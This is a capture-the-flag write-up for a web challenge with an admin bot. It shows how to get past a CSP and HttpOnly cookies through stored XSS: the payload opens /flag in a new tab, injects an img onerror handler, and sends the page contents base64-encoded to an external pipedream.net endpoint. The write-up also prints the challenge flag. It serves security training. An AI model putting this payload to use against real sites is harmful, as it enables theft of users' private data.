we got an admin bot, and its cookies are ser to HttpOnly and SameSite=Lax so, we can't get the cookie with just document.cookies you will get an empty string. read more about this here​!

Website Overview

we have a home page with a form which is vulnerable to stored XSS.

Source code review

we can see a CSP policy is set.

we can go to csp-evaluator to check what's vulnerable.

How to Get Flag ?

we have a Flag route which only admin can access

so these were my leads during CTF I couldn't solve it so after CTF I checked a payload's first line I saw window.open so with that clue in mind I started this challenge again.

these are the things which we can do with that CSP

• we can inject script for that page.

• we can't access or fetch /flag route. we can only execute js in present page

• we can control whole browser with window

with these in mind let's plan a payload

• we can open another tab with /flag window.open()

• we can execute code in that tab using it's assigned variable

• so, when that /flag is loaded we have to inject something to make a post request to /flag and send that data to our servers.

<script>
tab=window.open("/flag");
tab.window.onload=()=>tab.window.document.write(`<img src=x onerror="fetch('/flag',{method:'POST'}).then(response=>response.text()).then(response => fetch('https://eoeq1wfgfu9ld15.m.pipedream.net/?flag='+btoa(response)))"></img>`)
</script>

after making submitting the crime to admin bot we will get the flag.

lactf{m4yb3_g1v1ng_fr33_xss_1s_jus7_4_b4d_1d3a}

Homework not some homework exactly.

I want web team members to come up with other way to do this without using fetch.